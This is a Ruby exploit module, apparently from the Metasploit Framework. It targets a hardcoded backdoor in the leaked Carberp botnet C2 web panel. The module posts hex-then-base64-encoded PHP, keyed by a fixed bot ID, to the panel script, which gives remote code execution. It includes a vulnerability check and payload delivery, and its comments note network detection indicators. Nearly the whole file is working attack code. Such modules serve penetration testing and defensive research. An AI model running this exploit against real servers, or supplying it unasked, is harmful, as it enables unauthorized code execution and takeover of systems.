GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/webapp/carberp_backdoor_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient

  # Module metadata plus the two options the module reads at runtime:
  # TARGETURI (the panel script that carries the backdoor) and BOTID (the
  # fixed bot id the backdoor keys on).  From a monitoring point of view the
  # default BOTID value is a stable, literal string and therefore a useful
  # indicator for inbound POST traffic to a panel of this kind.
  def initialize(info = {})
    details = update_info(
      info,
      'Name' => 'Carberp Web Panel C2 Backdoor Remote PHP Code Execution',
      'Description' => %q{
        This module exploits backdoors that can be found all over the leaked
        source code of the Carberp botnet C2 Web Panel.
      },
      'License' => MSF_LICENSE,
      'Author' => [
        'bwall(Brian Wallace) <bwallace[at]cylance.com>', # msf module
        'connection(Luis Santana) <hacktalkblog[at]gmail.com>', # exploit reporting
        'Steven K <xylitol[at]malwareint[d0t]com>' # discovery and reporting
      ],
      'References' => [
        ['URL', 'http://www.xylibox.com/2013/06/carberp-remote-code-execution-carpwned.html']
      ],
      'Privileged' => false,
      'Payload' => {
        'Keys' => ['php'],
        'Space' => 10000,
        'DisableNops' => true
      },
      'Platform' => ['php'],
      'Arch' => ARCH_PHP,
      'Targets' => [
        ['carberp', {}]
      ],
      'DisclosureDate' => '2013-06-28',
      'DefaultTarget' => 0,
      'Notes' => {
        'Reliability' => UNKNOWN_RELIABILITY,
        'Stability' => UNKNOWN_STABILITY,
        'SideEffects' => UNKNOWN_SIDE_EFFECTS
      }
    )
    super(details)

    register_options(
      [
        OptString.new('TARGETURI', [true, "The path to the backdoor, often just index.php", "/index.php"]),
        OptString.new('BOTID', [true, 'Hardcoded backdoor bot ID that can run PHP eval', 'BOTNETCHECKUPDATER0-WD8Sju5VR1HU8jlV']),
      ]
    )
  end

  # Probe: send a snippet that echoes a random marker and look for that
  # marker in the response body.  Reports Vulnerable only when the marker
  # comes back; no response, or a body without the marker, is Safe.
  #
  # @return [Exploit::CheckCode]
  def check
    marker = rand_text_alpha(8)
    res = http_send_command("echo '#{marker}';")
    return Exploit::CheckCode::Vulnerable if res && res.body.include?(marker)

    Exploit::CheckCode::Safe
  end

  # Delivers one PHP snippet to the backdoor.  On the wire this is a POST to
  # TARGETURI carrying two form fields: `id` (the BOTID option) and `data`
  # (the snippet passed through unpack('H*') and then base64-encoded).  The
  # fixed field names and the static id are what a network detection would
  # key on.
  #
  # @param cmd [String] PHP code to send
  # @return [Rex::Proto::Http::Response, nil] the response, or nil when none
  #   was received
  def http_send_command(cmd)
    wire_data = Rex::Text.encode_base64(cmd.unpack('H*'))
    send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path.to_s),
      'vars_post' => {
        'id' => datastore['BOTID'],
        'data' => wire_data
      }
    )
  end

  # Sends the selected PHP payload through the same channel `check` uses.
  def exploit
    http_send_command(payload.encoded)
  end
end